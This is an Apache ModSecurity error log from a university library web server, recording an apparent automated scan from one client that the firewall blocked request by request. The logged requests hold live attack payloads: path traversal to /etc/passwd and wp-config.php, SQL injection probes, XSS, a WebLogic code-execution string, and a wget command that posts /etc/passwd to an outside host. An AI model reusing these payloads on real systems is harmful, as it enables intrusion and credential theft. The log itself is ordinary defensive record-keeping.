[Tue Aug 29 11:46:27.464535 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAib55QAAAAA"]
[Tue Aug 29 11:46:28.383954 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhZRpsAAAAG"]
[Tue Aug 29 11:46:28.506268 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhrqSQAAAAo"]
[Tue Aug 29 11:46:28.525464 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAib55sAAAAA"]
[Tue Aug 29 11:46:29.507709 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOQAAAAK"]
[Tue Aug 29 11:46:30.606982 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi5uHAAAAAS"]
[Tue Aug 29 11:46:30.690044 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAhtjlUAAAAq"]
[Tue Aug 29 11:46:31.361912 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjH@s0AAAAI"]
[Tue Aug 29 11:46:31.423567 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjFoeEAAAAF"]
[Tue Aug 29 11:46:33.354411 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAjKypYAAAAQ"]
[Tue Aug 29 11:46:33.422824 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAi-RC8AAAAH"]
[Tue Aug 29 11:46:34.377627 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAi5uIoAAAAS"]
[Tue Aug 29 11:46:35.396921 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjL8OsAAAAR"]
[Tue Aug 29 11:46:39.471142 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAi2yF0AAAAN"]
[Tue Aug 29 11:46:41.467368 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAjM6-wAAAAT"]
[Tue Aug 29 11:46:42.440654 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAhl0FEAAAAi"]
[Tue Aug 29 11:46:43.586703 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAjKysQAAAAQ"]
[Tue Aug 29 11:46:46.152433 2023] [:error] [pid 1836] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Navratan M. Bhandari\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14NsCo-f0AAAcsLb4AAAAE"]
[Tue Aug 29 11:46:47.423862 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhBSJcAAAAX"]
[Tue Aug 29 11:46:49.633265 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAi3Z1kAAAAP"]
[Tue Aug 29 11:46:52.389340 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjN0QcAAAAU"]
[Tue Aug 29 11:46:56.466561 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14QMCo-f0AAAjH@yAAAAAI"]
[Tue Aug 29 11:47:00.469646 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjIhmMAAAAJ"]
[Tue Aug 29 11:47:01.388017 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjM7BgAAAAT"]
[Tue Aug 29 11:47:02.507157 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjM7CAAAAAT"]
[Tue Aug 29 11:47:03.368308 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjKyvIAAAAQ"]
[Tue Aug 29 11:47:05.392868 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjN0R8AAAAU"]
[Tue Aug 29 11:47:06.366859 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjbwzYAAAAW"]
[Tue Aug 29 11:47:06.366924 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjbwzYAAAAW"]
[Tue Aug 29 11:47:07.416235 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gseupnt6eyh8je.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjKyvgAAAAQ"]
[Tue Aug 29 11:47:07.740476 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavzUAAAAV"]
[Tue Aug 29 11:47:10.663200 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjIhn8AAAAJ"]
[Tue Aug 29 11:47:11.423598 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM1gAAAAI"]
[Tue Aug 29 11:47:13.430396 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjtc00AAAAX"]
[Tue Aug 29 11:47:14.352839 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAj112QAAAAa"]
[Tue Aug 29 11:47:15.497375 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAjZRZUAAAAS"]
[Tue Aug 29 11:47:15.509067 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAj112cAAAAa"]
